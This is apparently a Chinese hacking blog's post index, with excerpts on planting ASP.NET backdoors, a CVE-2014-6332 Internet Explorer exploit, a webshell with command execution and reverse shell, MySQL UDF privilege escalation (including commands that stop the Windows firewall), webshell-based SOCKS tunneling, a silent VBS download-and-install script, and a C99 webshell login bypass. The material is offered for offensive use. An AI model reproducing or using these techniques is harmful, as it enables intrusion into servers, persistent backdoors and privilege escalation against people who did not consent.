2015-06-15 12:33:38

ASP.NET global.asax、httpHandlers、httpModules 后门

特别注意:需要特别小心配置任何一个误操作都可能导致网站彻底崩溃,对于新手操作危险系数很高。这里只是技术分享,请最好先在本地测试。如有发现BUG与我联系 :) 一:global.asax <%@ Application Language="C#" %> <script RunAt='server'> void Application_Start(object sender, EventArgs e) { //在应用程序启动时运行的代码 } void Application_End(object sender, EventArgs e) { //在应用程序关闭时运行的代码 } void Application_Error(object sender, EventArgs e) { } void Session_Start(object sender, EventArgs e) { //在新会话启动时运行的代码 } void Session_End(object sender, EventArgs e) { //在会话结束时运行的代码。

2015-05-30 01:57:59

sqlplus.jar命令行下连接Mysql、SQLServer、Oracle小工具

使用了一个btc-ascii-table小工具,可以像mysql客户端一样方便的管理数据库。自带mysql、sqlserver2000、2005+、oracle数据库驱动,可以在命令行下直连这几种数据库。连接的时候需要自行指定对应的数据库的驱动URL哦,百度下jdbc或者参考我以前的文章。 交互shell方式: 直接执行命令方式: java -jar sqlplus.jar "com.mysql.jdbc.Driver" "jdbc:mysql://localhost:3306/mysql" "root" "c123456" "select version()" import java.io.BufferedReader; import java.io.InputStreamReader; import java.sql.Connection; import java.sql.DriverManager; import com.bethecoder.ascii_table.ASCIITable; import com.bethecoder.ascii_table.impl.JDBCASCIITableAware; import com.bethecoder.ascii

2015-04-29 13:46:22

[Zone-lijiejie]GitHack -- 一个git泄露利用脚本

原文:http://zone.wooyun.org/content/20082 当前大量开发人员使用git进行版本控制,对站点自动部署。  如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。 GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,还原重建工程源代码。 渗透测试人员、攻击者,可以进一步审计代码,挖掘:文件上传,SQL注射等安全漏洞。 脚本的工作原理 1. 解析.git/index文件,找到工程中所有的: ( 文件名,文件sha1 ) 2. 去.git/objects/ 文件夹下下载对应的文件 3. 使用zlib解压文件,按原始的目录结构写入源代码 它的优点 1. 速度快,默认20个工作线程 2. 尽量还原所有的源代码,缺失一部分文件不影响脚本工作 3. 脚本不需要执行额外的git命令,有python就够了 可能的改进 存在文件被gc打包到git\objects\pack的情况,稍后可测试下看能否直接获取并解压这个文件,还原源代码 用法示例: GitHack.py http://www.hoolai.com/.git/ 执行中截图: 执行结果: 获取代码:https://github.com/lijiejie/GitHack 参考资料: Git Index Formart 非常感谢 sbp 的 gin - a

2014-11-14 23:42:00

[转]Internet Explorer < 11远程代码执行

//* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. cve-2014-6332 exploit https://twitter.com/yuange75 http://hi.baidu.com/yuange1975 *// <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "notepad.exe" end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab()

2014-11-12 16:02:44

axis2 利用小工具cat.aar

Axis2: Web Service是现在最适合实现SOAP的技术,而Axis2是实现Web Service的一种技术框架(架构)。 昨天把把菜刀脚本打包发现<>在xml会被转义,导致菜刀客户端无法连接。看起来别人可以修改response类型,但是我没成功。利用之前发的Cat小工具打包成aar就可以玩了。 axis2管理登陆默认配置了用户名为admin,密码axis2: axis2管理后台: 想要deploy 自己的应用需要先打成对应的aar、jar包。用eclipse安装axis2插件。 Service Archive Wizard - Eclipse Plug-in 、Code Generator Wizard - Eclipse Plug-in 下载地址:https://axis.apache.org/axis2/java/core/tools/index.html 下载完成后直接把对应的jar丢到eclipse的dropins目录就行了。 新建一个java项目,写好相关脚本。 导出aar: 安装完成后新建Axis2 service Archiver项目,当然可以根据自己的需求可以利用Axis2 code generator生成wsdl文件。 指定class file为此项目编译目录。 wsdl可以自动生成或者load已生成的wadl文件,可以跳过。Add any

2014-11-05 23:58:37

cat小工具

我觉得这都算不上什么webshell了,写这个只是为了简化一些操作。cat提供了简单的的文件遍历、管理、命令执行、反弹shell、文件下载、自动下载并执行这么几个小功能。 web界面只是一个简单的文件目录浏览功能和文件下载功能: 点击文件名可以编辑对应的文件,新建文件也可以在这里进行File地址写上需要编辑的文件绝对路径就行了: 执行系统命令会比较麻烦,因为需要自己写参数了: 请求:http://localhost:8080/Struts2/cat.jsp?action=exec&cmd=ifconfig 参数: action=exec cmd=需要执行的命令。 文件下载分为远程文件下载和本地文件下载。本地文件下载直接点击下载即可从服务器上下载对应的文件。而远程文件下载的则需要继续以参数的方式请求: 请求:http://localhost:8080/Struts2/cat.jsp?action=downloadL&url=http://www.baidu.com/img/bdlogo.png&path=bdlogo.png 参数: action=downloadL url=需要下载的文件的URL地址 path=文件保存的绝对路径,注意如果只写文件名会下载到当前运行环境的目录下(比如tomcat会下载到tomcat的bin目录)。 本地文件下载如遇到目录则自动

2014-08-15 15:00:19

SqlMap mysql udf.dll 提权

以前分享在百度网盘,好像没人看。直接发文字说明不贴图了哦。 sqlmap lib_mysqludf_sys.zip  上传dll文件到任意目录,如:D:/RECYCLER/lib_mysqludf_sys.dll 导入dll,根据版本导入到windows或mysql 插件目录(一般执行select @@plugin_dir 可看到插件目录具体路径): select load_file('D:/RECYCLER/lib_mysqludf_sys.dll') into dumpfile'c:/windows/lib_mysqludf_sys.dll' (高版本需要导入上面查询到的插件目录) 创建function: create function sys_eval returns string soname 'lib_mysqludf_sys.dll'; 执行命令: select sys_eval('whoami'); 一般情况下不会出现创建不成功哦。 连不上3389可以先停止windows防火墙和筛选 select sys_eval('net stop policyagent'); select sys_eval('net stop sharedaccess');

2014-08-13 23:55:21

[zone]利用webshell搭建socks代理

FROM:http://zone.wooyun.org/content/14470 老外的开源应用  https://github.com/sensepost/reGeorg  使用示例:  python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp Step 1. 上传一个脚本(aspx|ashx|jsp|php) 到web服务器上。  Step 2. 执行reGeorgSocksProxy.py脚本,连接shell监听端口。  ** 如果你使用nmap等工具需要用到 proxychains。  Step 3. Hack the planet 

2014-07-23 17:32:48

vbs下载并静默安装jre

安装完成后可以回调,替换echo 123456789和pause就行了。 dim path set ws = CreateObject("WScript.Shell") set fso=createobject("scripting.filesystemobject") ''定义安装路径 path = ws.ExpandEnvironmentStrings("%windir%")+"\jre6\" ''创建目录 If (fso.FolderExists(path)) Then Else fso.createfolder(path) End If ''文件下载 Set xPost = CreateObject("Microsoft.XMLHTTP") Set sGet = CreateObject("ADODB.Stream") Sub DownloadToFile(url, file) xPost.Open "GET", url, False xPost.Send sGet.Type = 1 sGet.Open sGet.Write xPost.response

2014-06-25 13:40:00

[zone]C99.PHP webshell 绕过登陆密码漏洞

from:http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/ 、http://zone.wooyun.org/content/13257 C99.php存在一个漏洞可以绕过登陆密码直接登陆的漏洞。  http://127.0.0.1/c99.php?c99shcook[login]=0 可直接登陆。  @extract($_REQUEST["c99shcook"]); 变量覆盖  if ($login) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if ($login_txt === false) { $login_txt = ""; } elseif (empty($login_txt)) { $login_txt = strip